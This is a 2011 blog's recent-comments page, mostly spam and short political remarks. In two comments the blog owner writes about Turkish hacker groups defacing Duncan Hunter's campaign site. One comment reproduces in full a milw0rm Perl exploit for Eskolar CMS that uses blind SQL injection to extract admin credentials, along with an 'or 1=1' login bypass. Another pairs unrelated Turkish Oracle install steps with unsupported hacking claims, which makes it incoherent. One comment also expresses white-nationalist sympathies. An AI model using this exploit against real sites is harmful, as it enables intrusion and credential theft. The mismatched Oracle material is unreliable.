Defend Our Freedoms From the Absense of Privacy: Recent Comments

Comment on Neo-Nazi Creativity Movement Is Back

CC Rider — Mon, 06 Jun 2011 05:57:31 GMT

The Creativity Movement? More like The Criminality Movement. At least this article shows that the Creativity Alliance is cleaning Creativity up and removing the most disreputable losers. I think that the day they put an end to The Criminality Movement is the day Creativity will metamorphise into a highly respected nature based religion for White people in the same way that Judaism is for Jews, Rastapharianism is for Blacks, Black Islam is for Blacks, Hinduism is for Indians, and so on. Keep up the good work Creativity Alliance and show the world that The Criminality Movement is abhorrent to all decent Creators.

Comment on The Illuminati Agenda For The Coming New Order The PROMIS Of DAYLIGHT And The ORACLE 8i

rsmolders — Mon, 28 Mar 2011 17:12:32 GMT

Why nobody responds tocomments?

Comment on Understanding the Internet 102 - PayPalGate

LauffNablef — Mon, 28 Mar 2011 15:52:12 GMT

I just book marked your blog on Digg and StumbleUpon.I enjoy reading yourcommentaries.

Comment on A Little Help With Web Security

Defendourfreedoms — Wed, 23 Mar 2011 12:15:45 GMT

The Turk-H, TurkHackTeams, Anonymous, Chaoscomputer Group affiliates, #HQ et al, remap the Oracle servers at the root. This allows them to download databases from the servers. Who is downloading your data and where is it going? You only know if one of their script kiddies tags your Index file. Otherwise, you don't know they reconfigured your server for their own access.

kdesu kwrite /etc/sysctl.conf

/etc/sysctl.conf dosyasının en sonuna aşağıdaki satırları ekleyiniz:

# Oracle 10g parameters
kernel.shmall = 2097152
kernel.shmmax = 2147483648
kernel.shmmni = 4096
kernel.sem = 250 32000 100 128
fs.file-max = 65536
net.ipv4.ip_local_port_range = 1024 65000
net.core.rmem_default=4194304
net.core.wmem_default=262144
net.core.rmem_max=4194304
net.core.wmem_max=262144

Yukarıdaki dosyada yaptığımız değişiklikleri uygulamak için konsolda bu komutu çalıştırın:

# /sbin/sysctl -p

Oracle değişkenleri

Tekrar Alt + F2 tuşuna basarak aşağıdaki komutu çalıştırın:

kdesu kwrite /home/oracle/.bash_profile

Bu dosyaya aşağıdaki satırları ekleyiniz.

ORACLE_BASE=/home/oracle/oracle
ORACLE_HOME=$ORACLE_BASE/product/10.2.0/client_1
ORACLE_SID=orcl
LD_LIBRARY_PATH=$ORACLE_HOME/lib
PATH=$PATH:$ORACLE_HOME/bin
export ORACLE_BASE ORACLE_HOME ORACLE_SID LD_LIBRARY_PATH PATH

Bu dosyayı kaydedip aşağıdaki komutları konsolda çalıştırın.

cd /home/oracle
. .bash_profile

Oracle Client İndirmek

Oracle’ın sitesinden 10201_client_linux32.zip dosyasını indirin (Eğer elinizde yoksa, bu 10g için şu an 11g’de var) Dosyayı indirdikten sonra /home/oracle dizinin altına "orakur" adlı bir dizin açıp buraya kopyalayıp burada açın. Şimdi "orakur" klasörünün içinde "install" klasörünün içinde "oraparam.ini" adında bir dosya var bu dosyayı "kwrite" ile açıp

SILENT_VARIABLE_VALIDATION=TRUE

[Certified Versions]
Linux=redhat-3,SuSE-9,redhat-4,UnitedLinux-1.0,asianux-1,asianux-2

[UnitedLinux-1.0-optional]
TEMP_SPACE=80
SWAP_SPACE=150
MIN_DISPLAY_COLORS=256

bu satırı bulup

[Certified Versions]
Linux=redhat-3,SuSE-9,redhat-4,UnitedLinux-1.0,asianux-1,asianux-2

satırını tamamen silip kaydedin.

Gerekli paketler

Konsolda aşağıdaki komutları sırası ile çalıştırın:

# sudo pisi it libaio
# sudo pisi it unixodbc

Artık kuruluma hazırız.

Kurulum
Kurulum

Temiz bir konsol açıp

"su oracle"

ile "oracle" kullanıcısına geçin ve aşağıdaki komutları sırası ile girin

# cd /home/oracle/orakur/client
# LC_ALL=C
# ./runInstaller

Burada LC_ALL=C komutu dil ayarları ile ilgili aksi halde kurulum son aşamada hata veriyor. Kurulumdaki bütün yönergeleri takip edin. Kurulumun varsayılan yolunu değişirseniz üçüncü adımdaki parametreyi değişmeniz gerekir. Karşınıza "Network Configuration Assistant" çıkacak. "Perform Typical" olarak ayarlayıp bu kısmı da bitirin. En son size bazı dosyaları çalıştırmanızı söyleyecek, bu ekranı kapatmadan bir konsol penceresi açıp color=#0000ffroot olarak girin ve sırasıyla şu komutları çalıştırın:

# cd /home/oracle/oraInventory
# ./orainstRoot.sh
#
#
# cd /home/oracle/oracle/product/10.2.0/client_1
# ./root.sh (cevap bekleyen sorulara "ENTER" ile direk cevap verin)

Artık kurulum bitti :)

Çalıştırma
Console’u çalıştırma

Konsoldan çalıştırmadan önce mutlaka

LC_ALL=C

Komutu verilmeli.

Aşağıdaki satırları;

LC_ALL=C
/home/oracle/oracle/product/10.2.0/client_1/bin/oemapp console
--------------------------------------------------------------------------------------------

Comment on A Little Help With Web Security

Defendourfreedoms — Wed, 23 Mar 2011 11:48:08 GMT

These sites being hacked aren't just leaving cute pictures and messages on the Index pages. They are cracking the database and downloading them. The pictures and messages are just to let you know they were there, like a gang tag. If they don't leave the gang tag, then you will never know your database was downloaded.

http://www turkhackteam .org/eskolar-cms-0-9-0-0- remote-blind-sql-injection-exploit -t3963.html?s=f2559d37ab0bda0567557e1ade83c6de&t=3963

This is the Insert SQL that was used Please note, the worm that was inputted to the database contains access for future use . What I read from the email from ElectionMall's lack of responsibility for leaving the database vulnerable, that they only reloaded the HTML splash pages and did absolutely nothing to secure the database.

#===#!/usr/bin/perluse IO::Socket;#====================================== ================================================== ==========#======================================= =======================================## Jacek Wlodarczyk (j4ck) - jacekwlo[at]gmail[dot]com ##================================================ ==============================##================== ================================================== ==============================#Title: Eskolar CMS 0.9.0.0 Blind SQL Injection Exploit and bypass admin logon vulnerability #Application: Eskolar CMS#Version: 0.9.0.0#Url: [Only Registered Users Can See Links]================================================= =================================================# ================================================== ================================================#A ffected software description:#Not properly sanitized input can be used to inject crafted SQL queries and cause#the database server to generate an invalid SQL query. We can use Blind SQL Injection attack#to determine username and password for CMS and also classical SQL Injection#to bypass admin logon. Password for CMS is storing in database as clear text!#There is using addslashes() function to filtration GET variables, but we can prepare#SQL query without slashes in Blind attack . There is not addslashes() function to filtration#variables using to log in, so we can use classical SQL Injection to log in as admin .#Vulnerable files: index.php, php/lib/del.php, php/lib/download_backup.php, php/lib/navig.php,#php/lib/restore.php, php/lib/set_12.php, php/lib/set_14.php, php/lib/upd_doc.php#====================================== ================================================== ==========#======================================= ================================================== =========#Sample vulnerable code: (Blind attack) (index.php - lines 161-172)#if (isset ($_GET['gr_1_id'])) {# $gr_1_id = (get_magic_quotes_gpc()) ? $_GET['gr_1_id'] : addslashes($_GET['gr_1_id']);#}#if (isset ($_GET['gr_2_id'])) {# $gr_2_id = (get_magic_quotes_gpc()) ? $_GET['gr_2_id'] : addslashes($_GET['gr_2_id']);#}#if (isset ($_GET['gr_3_id'])) {# $gr_3_id = (get_magic_quotes_gpc()) ? $_GET['gr_3_id'] : addslashes($_GET['gr_3_id']);#}#if (isset ($_GET['doc_id'])) {# $doc_id = (get_magic_quotes_gpc()) ? $_GET['doc_id'] : addslashes($_GET['doc_id']);#}#...#index.php - line 202#$q = "SELECT * FROM ".$prefix."_admin_group_3 WHERE id = ".$gr_3_id." ORDER BY 'sorted' ASC";#etc.#...#======================================= ================================================== =========#======================================== ================================================== ========# Bypass admin logon :#Vulnerable code: (php/esa.php - lines 27-35)#$uid = isset ($_POST['uid']) ? $_POST['uid'] : $_SESSION['uid'];#$pwd = isset ($_POST['pwd']) ? $_POST['pwd'] : $_SESSION['pwd'];#//$prefix="esa";#$enter = 0;#$_SESSION['uid'] = $uid;#$_SESSION['pwd'] = $pwd;# mysql_select_db($database _bkb, $bkb);#$q_a = "SELECT * FROM ".$prefix."_admin_user WHERE `user` = '".$uid."' AND `password` = '".$pwd."'";## If magic_quotes_gpc = Off attacker can log in as admin using classical SQL Injection attack.## Eg: USER: j4ck' or 1=1/*## PSW: *blank*#========================================== ================================================== =======#PoC Exploit:if ((@ARGV lt 2) or (@ARGV gt 3)) { &usage; }sub usage(){ print "\r\n (c) Jacek Wlodarczyk (j4ck)\r\n\r\n"; print "- Exploit for Eskolar CMS 0.9.0.0\r\n\r\n"; print "- Usage: $0 <target> <target directory>\r\n"; print "- <target> -> Victim's target eg: [Only Registered Users Can See Links]"; print "- <target directory> -> Path to index.php eg: /eskolar/\r\n"; print "- Eg: [Only Registered Users Can See Links] /esa/\r\n\r\n"; exit();}$HOST = $ARGV[0];$DIR = $ARGV[1];$prefixDB = $ARGV[2];if (@ARGV eq 2) { $prefixDB = "esa"; } print "\r\nATTACKING : ".$HOST.$DIR."\r\n\r\n";$HOST =~ s/([Only Registered Users Can See Links])//;#$positive = "?doc_id=999%20or%201=1--";#$negative = "?doc_id=999%20or%201=0--"; @ARR = ("user","password"); print "Connecting ...\r\n";sleep(1);TOP:for ($k=0;$k<=$#ARR;$k++) { $j=1; $i = 32; $string=''; $res=''; while() { $l=0; for ($i=32;$i<=127;$i++) { $val = "?doc_id=99999"; $val .= "/**/or/**/1=1"; $val .= "/**/and/**/ascii(substring("; $val .= "(select/**/$ARR[$k]/**/from/**/".$prefixDB."_admin_user/**/limit/**/1)"; $val .= ",$j,1))/**/=/**/$i"; $data="$DIR$val"; $req = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$HOST", PeerPort => "80") || die "Error - connection failed!\r\n\r\n"; print $req "GET $data [Only Registered Users Can See Links]"; print $req "Host: $HOST\r\n"; print $req "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4\r\n"; print $req "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n"; print $req "Accept-Language: en-us;q=0.7,en;q=0.3\r\n"; print $req "Accept-Encoding: gzip,deflate\r\n"; print $req "Keep-Alive: 300\r\n"; print $req "Connection: Keep-Alive\r\n"; print $req "Cache-Control: no-cache\r\n"; print $req "Connection: close\r\n\r\n"; while ($ans = <$req>) { if ($ans =~ /404/ ) { print f "\n\nFile not found.\r\n\r\n"; exit; } if ($ans =~ /400/ ) { print f "\n\nBad request.\r\n\r\n"; exit; } if ($ans =~ /ORDER BY sorted ASC/) { $string .= chr($i); if (((ord(substr($string,length($string)-1,length($string)-1))-ord(substr($string,length($string)-2,length($string)-2))) %2 eq 0) and (length($string) ge 2)) { $res .= chr($i-1); $l=1; } last; } } if ($l eq 1) { print "Found: ".chr($i-1)."\r\n"; sleep(1); last; } if ($i eq 127) { print "$ARR[$k] found: $res\r\n"; $ARR[$k] = $res; if (($k eq 1) and (($ARR[0] ne '') or ($ARR[1] ne ''))) { print "\r\n\r\n\r\n-------------------- Username => $ARR[0]"; print " Password => $ARR[1] -----------------------\r\n"; } elsif (($ARR[0] eq '') and ($ARR[1] eq '')) { print "Nothing found ..."; } if ($k eq 0) { sleep(1); print "\nTrying Password\r\n"; sleep(1); } sleep(1); next TOP; } print "\t\t\t\tTrying: ".chr($i)."\r\n"; } $string = ''; $j++; } }#================================================ ================================================== ======# milw0rm.com

So who was printing Duncan Hunter's databases and what happened to all of the people's information that assisted with that primary campaign? Yes, the primaries are over, but the hacking, stalking and harrassing is not. This is also a working model for all the cracks, hacks and stalking that have happened to websites since. I just happen to have all of this data to work with.

Comment on A Little Help With Web Security

Defendourfreedoms — Wed, 23 Mar 2011 11:36:48 GMT

Primaries are over. Why is this relevant? Because the Turk-H, TurkHackTeam are connected to all the data dumps and hacks still occuring on the Net today. When looking into the now, never forget the past.

http://wwwslatecom/blogs/blogs/trailhead/archive/2008/01/17/exclusive-duncan-hunter-gets-hacked.aspx
Exclusive! Duncan Hunter Gets Hacked
Posted Thursday, January 17, 2008 6:00 PM | By Chadwick Matlin
In a rare occurrence, I visited Duncan Hunter's Web site today to see if it still hadn't been updated in months. Surprisingly, it had. By a hacker.

In the scrolling news marquee, a team of hackers who go by the handles clientcode, undertaker, and theghost left a message for all of Hunter's American fans: "Kiss You Babyyy yeahhh (:"

Is that the best they couldcome up with? How about, "Duncan Hunter is a one-delegate farce," "Duncan Hunter supports an Iraq war that's killed hundreds of thousands of people," or "Duncan Hunter, you're a God-fearing slimeball. Drop out of the race." If you're going to hack the man's site, at least do it with a little panache.

This isn't the first time Hunter's site has been hacked, according to campaign manager Roy Tyler. He told me that a few days ago, Turkish hackers got into the site and left a message in Arabic that blasted Hunter for his pro-Iraq record. It was also hacked about a year ago. Tyler said the campaign expected to be a hacker target, so they took extra security precautions, but to no avail. When I called, Tyler said the campaign was unaware of the latest hack, but I later found out his tech team was already on it, and it was fixed it a few minutes later.

Trailhead found people on the Internet bragging about the hack that occurred earlier this week. A hacker congregation site, Turk-h.org, seems to suggest that someone going by "ayyildiz" attacked the site because of "politik sebepler" or "political causes" (according to a Turkish-English translation done by a friend) . But it looks like different hackers (clientcode, undertaker, and theghost) got into the site this time. If my very uneducated assumptions are correct, it looks like ayyildiz is a prolific hacker, defacing over a thousand sites according to his profile on turk-h.org. The names "clientcode" and "undertaker" also appear frequently on various hacker forums.

But of all the sites on the Internet, ayyildiz picked Hunter's to defame. He now joins the illustrious ranks of topsexxxlinkscom and turtle-pictures.de. But look on the brightside, at least somebody somebody cares about Hunter's political beliefs.

With Chris Wilson.

Filed under: Duncan Hunter

Comment on Absolut Spirits Co. Redraws U.S. Map

Plumbing Boston — Thu, 30 Sep 2010 13:55:37 GMT

What a stupid marketing ploy! I will never purchase Absolut again after seeing this advertisement! Mexico taking over the US....never!!

Comment on Wisconsin man gets 10 years in prison for arranging sex with 8-year-old girl

Plumbing Boston — Thu, 30 Sep 2010 13:47:58 GMT

I am so glad this man is behind bars now! How disgusting of a person must you be to want to do these things to a little girl! I hope he stays in jail forever!!

Comment on Hunter Statement on Attacks Against Rush Limbaugh

Plumbing Boston — Thu, 30 Sep 2010 13:45:14 GMT

I love that Congressman Hunter issued this statement! If both parties would stop create controversies and placing blame on the other, maybe we could actually get some work done in Congress!

Comment on Salvaging the “Stimulus” Package

Plumbing Boston — Thu, 30 Sep 2010 13:42:16 GMT

I think the zero federal taxes on domestic manufacturing would be great! I have watched my hometown of Muncie, IN deteriorate considerably due to all the manufacturing plants moving overseas.